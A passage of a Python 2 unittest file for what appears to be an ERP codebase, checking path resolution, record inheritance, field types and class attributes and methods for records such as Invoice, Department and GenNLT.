findTxt = lambda x, y: x.find(y) > -1
assert findTxt(recPaths["Task"][0], "base")
assert findTxt(recPaths["Department"][0], "StdPy")
assert findTxt(recPaths["Department"][1], "standard")
assert findTxt(repPaths["ListWindowReport"][0], "base")
assert findTxt(repPaths["ExpensesList"][0], "StdPy")
assert findTxt(repPaths["ExpensesList"][1], "standard")
assert findTxt(rouPaths["GenNLT"][0], "StdPy")
assert findTxt(rouPaths["GenNLT"][1], "standard")
assert findTxt(corePaths["Field"][0], "embedded")
self.assertFalse([k for (k, v) in rouPaths.iteritems() if findTxt(v[0], "base")]) #no routines in base
def test_recordInheritance(self):
recf, recd = getRecordInheritance("Invoice")
assert all([f1 in recf for f1 in ("SalesMan", "InvoiceDate", "CustCode", "Currency", "ShiftDate", "OriginNr", "SerNr", "attachFlag")])
assert all([d in recd for d in ("CompoundItemCosts", "Payments", "Items", "Taxes", "Installs")])
recf, recd = getRecordInheritance("AccessGroup")
assert all([f2 in recf for f2 in ("PurchaseItemsAccessType", "InitialModule", "Closed", "internalId")])
assert all([d in recd for d in ("PurchaseItems", "Customs", "Modules")])
def test_recordsInfo(self):
recf, recd = getRecordsInfo("Department", RECORD)
assert recf["Department"]["AutoCashCancel"] == "integer" #From StdPy
assert recf["Department"]["DeptName"] == "string" #From standard
assert recf["Department"]["Closed"] == "Boolean" #From Master
assert recf["Department"]["internalId"] == "internalid" #From Record
assert recd["Department"]["OfficePayModes"] == "DepartmentOfficePayModeRow" #Recordname from detail
repf, repd = getRecordsInfo("Balance", REPORT)
assert repf["Balance"]["LabelType"] == "string" #StdPy
assert repf["Balance"]["ExplodeByLabel"] == "boolean" #Standard
assert repf["Balance"]["internalId"] == "internalid" #Record
assert not repd["Balance"] #Empty dict, no detail
rouf, roud = getRecordsInfo("GenNLT", ROUTINE)
assert rouf["GenNLT"]["ExcludeInvalid"] == "boolean"
assert rouf["GenNLT"]["Table"] == "string"
assert not roud["GenNLT"]
rouf, roud = getRecordsInfo("LoginDialog", RECORD)
assert rouf["LoginDialog"]["Password"] == "string" #embedded
assert not roud["LoginDialog"]
def test_classInfo(self):
attr, meth = getClassInfo("Invoice")
assert attr["DEBITNOTE"] == 2
assert attr["ATTACH_NOTE"] == 3
assert attr["rowNr"] == 0
assert attr["ParentInvoice"] == "SuperClass"
assert isinstance(attr["DocTypes"], list)
assert isinstance(attr["Origin"], dict)
assert all([m in meth for m in ("getCardReader", "logTransactionAction", "updateCredLimit",
"generateTaxes", "roundValue", "getOriginType", "bring", "getXML", "createField")])
assert meth["fieldIsEditable"][0] == "self"
assert meth["fieldIsEditable"][1] == "fieldname"
assert meth["fieldIsEditable"][2] == {"rowfieldname":'None'}
assert meth["fieldIsEditable"][3] == {"rownr":'None'}
attr, meth = getClassInfo("User")
assert attr["buffer"] == "RecordBuffer"
assert all([m in meth for m in ("store", "save", "load", "hasField")])
def test_suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestFuncs))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.